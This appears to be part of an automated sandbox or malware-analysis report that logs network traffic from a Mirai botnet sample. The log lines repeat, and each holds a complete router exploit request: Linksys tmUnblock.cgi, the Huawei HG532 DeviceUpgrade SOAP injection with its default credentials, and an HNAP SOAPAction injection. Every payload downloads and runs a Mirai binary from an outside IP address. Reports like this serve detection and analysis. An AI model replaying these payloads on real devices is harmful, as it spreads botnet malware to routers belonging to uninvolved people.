| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
